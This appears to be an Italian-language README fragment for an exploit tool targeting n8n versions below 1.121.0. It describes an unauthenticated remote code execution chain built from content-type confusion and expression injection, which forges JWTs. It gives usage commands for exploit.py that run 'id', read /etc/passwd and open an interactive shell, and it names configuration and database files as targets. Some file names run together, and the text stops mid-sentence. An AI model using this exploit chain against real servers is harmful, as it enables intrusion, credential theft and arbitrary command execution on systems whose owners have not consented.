
Catena di exploit per l'esecuzione remota di codice non autenticata in n8n, che combina confusione sul content-type e iniezione di espressioni per leggere file, forgiare JWT ed eseguire comandi.
Catena RCE non autenticata per n8n < 1.121.0 (CVSS 10.0)
/home/node/.n8n/config e database.sqlitechild_process# Esegui un comando
python3 exploit.py http://target:5678 /form/test --cmd "id"
# Leggi un file
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# Shell interattiva
python3 exploit.py http://target:5678 /form/test
Il target deve avere un workflow attivo con: